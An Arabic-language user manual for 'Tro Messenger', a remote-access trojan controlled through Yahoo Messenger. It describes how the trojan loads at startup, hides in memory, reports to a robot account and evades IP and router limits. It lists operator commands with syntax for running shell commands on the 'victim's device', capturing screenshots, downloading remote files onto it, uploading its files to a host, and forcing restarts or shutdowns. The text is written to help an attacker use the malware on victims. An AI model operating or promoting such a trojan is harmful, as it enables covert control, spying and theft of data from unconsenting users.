ترو مسنجر
(تروجان
للأتصال عن بعد باستخدام الياهو مسنجر)
برمجة:
Sma
Soft
www.sma-soft.ir
sma_soft @ yahoo.com
Translation by: u0ms @ yahoo.com
To View Edit Server Help Click Here.
نظرة على البرنامج:
هذا البرنامج هو تروجان يستخدم
للسيطرة عن بعد على الأجهزة بواسطة الياهو مسنجر
بواسطة هذا البرنامج يمكنك أن تتحكم عن بعد بجهاز الضحية عن طريق ارسال رسائل الى
أيميل آخر يعمل آليا (روبوت) تحدده أنت في أعدادات البرنامج .
أي أنك عن طريق هذا البرنامج تتحدث مع جهاز الضحية
وتأمره بالقيام بعملية معينة !
كيف يعمل برنامج ترو مسنجر؟
هذه هي خطوات عمل البرنامج:
0) يبدأ بالعمل مع بدأ تشغيل الجهاز (StartUp)
1) يتخذ موقعا في الذاكرة ( memory
)
2) ينتظر لحين تفعيل الأتصال بالأنترنيت
3) عندما يتم تفعيل الأتصال بالأنترنيت ، يقوم بالمحاولة
للأتصال والدخول بالأيميل الآلي (robot) الذي حددته .
4) يقوم بارسال المعلومات الى الأدمن عن طريق الياهو مسنجر
عندما يتم الدخول بالأيميل الآلي .
5) الآن يمكنك أن تسيطر على جهاز الضحية عن طريق أرسال الأوامر
الى الأيميل الآلي الخاص بك عبر الياهو مسنجر
أضغط هنا لكي ترى لقطة شاشة تريك كيفية عمل البرنامج .
المزايا الخاصة للبرنامج :
لا حاجة لعنوان الآي بي ! ، هذا يعني أن هذه هي أفضل ميزة في البرنامج . في التروجنات الأخرى عليك أن تحصل على عنوان الآي بي الخاص بجهاز الضحية الذي تحاول الأتصال به . لكن هذا البرنامج يعمل بدون الحاجة لعنوان الآي بي .
سؤال
- كيف يستطيع التروجان أن يعمل بدون عنوان الآي بي ؟
الجواب - لأن هذا البرنامج يوفر أيميل
ID على الياهو يقوم بالعمل آليا لخدمتك ،
أذن أن لست بحاجة لمعرفة عنوان الآي بي الخاص بجهاز الضحية . على الرغم من أن عنوان
الآي بي سوف يرسل أليك عندما يتصل جهاز الضحية بالأنترنيت . لكن هذه العملية هي
فقط لتمكنك من معرفة المزيد من المعلومات حول جهاز الضحية . وليست لها أي تأثير على
عمل برنامج ترو مسنجر .
البرنامج يعمل مع الأجهزة االتي تستعمل شبكات اللان
LAN والأجهزة التي تستعمل راوتر
Router .
المشكلة الكبرى في التروجنات الأخرى مثلا تروجان Troya
هي أنها تعمل فقط على الأجهزة المتصلة بشبكة واحده . أي أن
الجهاز الهدف يجب أن يكون لديه عنوان آي بي مشابه لعنوان الآي بي الخاص بك .
مثلا : أذا كانت هناك شبكة مكونة من خمس أجهزة وأنت عضو في هذه الشبكة ، يمكنك
عندها أن تتصل بالأجهزة الأربعة الباقية . ولكن شخصا من خارج هذه المجموعة
لا يستطيع أن يتصل بأي جهاز من هذه الشبكة . وذلك
لأنه غير متصل بهذه الشبكة وبالتالي عنوان الآي بي الخاص به غير مقبول بالنسبة لهذه
الشبكة .
لكن هذه المشكلة محلولة في برنامج ترو
مسنجر .
بواسطة برنامج ترو مسنجر ، يمكنك الأتصال
بأي جهاز وفي أي شبكة . المطلوب فقط هو أن
يكون الجهاز متصل بالأترنيت ويعمل فيه خادم برنامج
ترو مسنجر .
الأوامر :
في هذا الأصدار ، هنالك بعض الأوامر الأساسية التي تمكنك
من السيطرة على جهاز الضحية .
النتيجة :
نتيجة تنفيذ أي أمر من أوامر البرنامج سوف ترسل أليك مباشرة بعد أكمال تنفيذ
العملية . لكن اذا كان النص المرسل طويلا ( أكثر من .... رمزاً)، فأن البرنامج سوف
يقوم بأرساله على شكل أجزاء بالتتابع . وذلك لأن الياهو مسنجر لا يسمح بأرسال نصوص
يكون طولها أكبر من عدد معين من الرموز .
/cmd
- يقوم هذا الأمر بفتح نافذه الدوز .
يمكنك الآن أن تنفذ أيعازات الدوز على جهاز الضحية ومشاهدة النتيجة . الأوامر التي
تستطيع تنفيذها هي أوامر الدوز العادية مثل : DIR , VER , VOL , IPConfig ,Netstat
,WHOAMI .... الخ من أيعازات الدوز المفيدة .
مثال :
cmd dir
C:\*.txt/
/Help - يقوم بعرض قائمة من الأوامر المتوفرة في هذا الأصدار من برنامج ترو مسنجر . ربما سيضاف أيعاز news بالأصدارات القادمة . بحيث تستطيع معرفة الأخبار عن طريق تنفيذ هذا الأيعاز او الأمر .
/screenshot -
يقوم بعرض لقطة من شاشة جهاز الضحية .
سؤال - الياهو مسنجر هو برنامج أساس
عمله أرسال واستقبال النصوص ، فكيف يقوم برنامج ترو مسنجر بأرسال الصور ألي ؟
جواب - برنامج ترو مسنجر يمكنك من عرض الصور بصورة غير
مباشرة . ذلك يعني : البرنامج يقوم بألتقاط صورة لشاشة جهاز الضحية ، ثم يرفعها على
المضيف ، ثم يعطيك الرابط الخاص بالصورة الملتقطة.
/download -
يقوم بتنزيل ملف معين من
الأنترنيت ثم يحفظه في مسار تقوم أنته بتحديده . سوف يقوم البرنامج بأعلامك عند
أكمال عملية التحميل . مثال :
Syntax: /download
"http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
ملاحظة :
عليك أن تستعمل علامات الأقتباس (") . واذا نسيت أن تستعملها فلن تعمل عملية
التحميل.
/restart -
يقوم بعمل رسيتارت او أعادة تشغيل لجهاز الضحية .
تحذير : اذا قمت بتجربة هذا الأمر على الجهاز
الخاص بك ، فسوف يقوم جهازك بعمل ريستارت بدون أعلام أو أذن منك . ولن تحفظ أي
تغييرات في البرامج المفتوحة في وقتها . لذلك كن حذرا في التعامل مع هذا الأيعاز .
وكذا الحال بالنسبة للأمر Shutdown.
/shutdown - يقوم بأطفاء جهاز الضحية . ( أكرر التحذير السابق).
time , /date - يقوم بأظهار الوقت والتاريخ .
/ejectcd - يقوم بفتح السي دي روم .
/closecd - يقوم بأغلاق السي دي روم بعد أن قمت بفتحه .
/view - يقوم بأظهار محتويات ملف نصي معين . ملاحظة : اذا كان النص طويلا ، فسوف يقوم البرنامج بأرساله اليك على شكل دفعات متتابعة واحدة بعد الأخرى .
/getfile - يقوم برفع ملف معين الى المضيف ثم يقوم بأعطائك الرابط الخاص به . هذا الأمر يستخدم لتحميل الملفات الثنائية ( غير النصية ) من جهاز الضحية.
status , /idle , /busy
- يقوم بتحديد رسالة الحالة (status messege
) الخاصة بالأيميل الآلي الى أي شي تريده ، بالأضافة الى
الأيكونات الخاصة برسالتي busy و idle
والتي تظهر بجانب اسم الأيميل في المسنجر .
أمثلة :
/status Now I'm Ready.
/idle I'm away from PC.
/Busy Currently Busy.
cancel - يقوم بألغاء تنفيذ العملية الحالية . فمثلا لو قررت أن تشاهد محتويات ملف نصي حجمه 1 ميكا بايت . وكان النص يرسل اليك دفعة دفعة ، لكنك قررت أن تلغي هذه العملية ولا تستلم بقية النص الخاص بالملف . يمكنك أن تستعمل هذا الأمر وتكتب cancel/ .
login -
يستخدم للدخول بالأيميل الآلي بالنسبة لشخص آخر . في كل مرة
يبدأ برنامج ترو مسنجر بالعمل . أذا لم تكن الشخص الذي صنع الأيميل الآلي ولكنك
تعرف كلمة السر الخاصة بالأيميل ، يتوجب عليك أن تستخدم الأمر login your
password/ لكي تتمكن من أستخدام البرنامج ، حيث تضع بدل
your password الكلمة السرية الخاصة بالأيميل الآلي .
لا تقم بأستخدام علامات الأقتباس لتحديد كلمة السر .
ترجمة : بروفيسور أكس
البريد الأليكتروني :
u0ms@yahoo.com